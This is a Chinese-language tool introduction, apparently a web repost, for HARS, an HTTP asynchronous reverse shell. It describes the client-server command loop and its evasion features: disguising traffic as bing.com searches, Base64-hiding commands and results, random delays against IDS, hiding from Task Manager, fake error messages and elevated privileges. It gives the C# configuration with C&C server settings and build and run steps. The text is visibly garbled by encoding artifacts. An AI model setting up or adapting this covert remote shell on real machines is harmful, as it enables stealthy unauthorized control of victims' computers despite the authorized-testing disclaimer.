Http-Asynchronous-Reverse-Shell是什么意思

這篇文章主要介紹了Http-Asynchronous-Reverse-Shell是什么意思，具有一定借鑒價(jià)值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓小編帶著大家一起了解一下。

   目前，我們有很多種方法可以創(chuàng)建一個(gè)反向Shell，并嘗試?yán)@過(guò)防火墻以成功控制遠(yuǎn)程設(shè)備。但實(shí)際上，傳出的連接并不一定都會(huì)被過(guò)濾。

然而隨著技術(shù)的發(fā)展，安全軟件和硬件（入侵防御系統(tǒng)IPS、入侵檢測(cè)系統(tǒng)IDS、代理、反病毒產(chǎn)品和EDR等）也變得越來(lái)越強(qiáng)壯，它們有能力去檢測(cè)到這些攻擊行為。而大多數(shù)情況下，與反向Shell的連接都是通過(guò)TCP或UDP隧道建立的。

因此，我們需要隱藏這些通信信道，而最好的方法就是將它們偽裝成合法連接。標(biāo)準(zhǔn)用戶使用最多的就是HTTP協(xié)議了，而且這種類型的流量幾乎不會(huì)被過(guò)濾掉，以避免影響用戶的網(wǎng)站瀏覽和訪問(wèn)。

工作機(jī)制

1、客戶端App首先需要在目標(biāo)設(shè)備上執(zhí)行；

2、客戶端與服務(wù)器建立初始連接；

3、服務(wù)器接受連接建立請(qǐng)求；

接下來(lái)：

客戶端接收到指令之后，會(huì)向服務(wù)器發(fā)送查詢請(qǐng)求；

攻擊者提供指令給服務(wù)器端；

當(dāng)命令被定義后，客戶端將會(huì)執(zhí)行該命令，并返回執(zhí)行結(jié)果；

然后不斷執(zhí)行上述流程，直到攻擊者結(jié)束會(huì)話連接為止。

功能介紹

該工具的當(dāng)前版本實(shí)現(xiàn)了以下幾種功能：

1、將HTTP流量偽造成bing.com的搜索流量；

2、命令會(huì)以Base64編碼在HTML響應(yīng)中；

3、命令執(zhí)行結(jié)果會(huì)以Base64編碼在客戶端cookie中；

4、[可選]SSL支持，默認(rèn)使用偽造的bing.com證書；

5、在每一個(gè)客戶端調(diào)用請(qǐng)求之間設(shè)置隨機(jī)延遲，以避免觸發(fā)IDS；

6、服務(wù)器的每一個(gè)響應(yīng)都使用了隨機(jī)模板；

7、復(fù)用相同的PowerShell進(jìn)程以避免觸發(fā)EDR；

8、支持所有的CMD以及PowerShell命令；

9、[可選]客戶端可以在啟動(dòng)時(shí)顯示偽造的錯(cuò)誤信息；

10、客戶端在任務(wù)管理器中不可見(jiàn)；

11、[可選]客戶端能以管理員身份運(yùn)行；

反病毒產(chǎn)品檢測(cè)

我們使用了69款反病毒產(chǎn)品來(lái)對(duì)我們的客戶端來(lái)進(jìn)行檢測(cè)，其中只有三個(gè)會(huì)將其檢測(cè)為惡意程序，而且還是在沒(méi)有使用任何AV規(guī)避或混淆技術(shù)的情況下。

工具配置

客戶端：C Sharp

1、在Visual Studio中打開(kāi)HARS.sln文件。

Config.cs

這個(gè)文件中包含了工具的運(yùn)行參數(shù)，我們需要根據(jù)具體情況來(lái)配置每個(gè)參數(shù)的值：

class Config    {        /* Behavior */        // Display a fake error msg at startup        public static bool DisplayErrorMsg = true;        // Title of fake error msg        public static string ErrorMsgTitle = "This application could not be started.";        // Description of fake error msg        public static string ErrorMsgDesc = "Unhandled exception has occured in your application. \r\r Object {0} is not valid.";        // Min delay between the client calls        public static int MinDelay = 2;        // Max delay between the client calls        public static int MaxDelay = 5;        // Fake uri requested - Warning : it must begin with "search" (or need a change on server side)        public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";        /* Listener */        // Hostname/IP of C&C server        public static string Server = "https://127.0.0.1";        // Listening port of C&C server        public static string Port = "443";        // Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy        public static bool AllowInsecureCertificate = true;}

HARS.manifest

按照下列命令修改相應(yīng)參數(shù)，工具將默認(rèn)以特殊權(quán)限運(yùn)行：

<requestedExecutionLevel level="requireAdministrator" uiAccess="false" /><requestedExecutionLevel level="asInvoker" uiAccess="false" /><requestedExecutionLevel level="highestAvailable" uiAccess="false" />

項(xiàng)目屬性

在下面這個(gè)界面中，你可以自定義配置編譯信息以及文件圖標(biāo)：

注意：目標(biāo).NET框架版本設(shè)置為了v4.6，Windows 10默認(rèn)自帶了這個(gè)版本的框架。如果是Windows 7，你可以選擇.NET v3.5。

代碼構(gòu)建

你需要在Visual Studio中構(gòu)建項(xiàng)目源碼，生成的客戶端程序?qū)⒋鎯?chǔ)在Http Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release目錄下。

服務(wù)器端：Python

HARS_Server.py文件位于Http Asynchronous Reverse Shell\HARS_Server\www目錄下。如果你需要修改端口或證書位置，可以直接修改配置文件中的相應(yīng)參數(shù)：

# ConfigPORT = 443CERT_FILE = '../server.pem'

工具運(yùn)行

python HARS_Server.py

其他配置

1、HTTP日志文件存儲(chǔ)在Http Asynchronous Reverse Shell\HARS_Server\logs目錄下。

2、你可以在Http Asynchronous Reverse Shell\HARS_Server\templates目錄下添加你自己的模板（任意HTML頁(yè)面文件）。

工具演示

客戶端

服務(wù)器端

聲明

此工具僅用作授權(quán)安全測(cè)試的概念驗(yàn)證演示工具，請(qǐng)不要將其用于惡意目的。

感謝你能夠認(rèn)真閱讀完這篇文章，希望小編分享的“Http-Asynchronous-Reverse-Shell是什么意思”這篇文章對(duì)大家有幫助，同時(shí)也希望大家多多支持億速云，關(guān)注億速云行業(yè)資訊頻道，更多相關(guān)知識(shí)等著你來(lái)學(xué)習(xí)!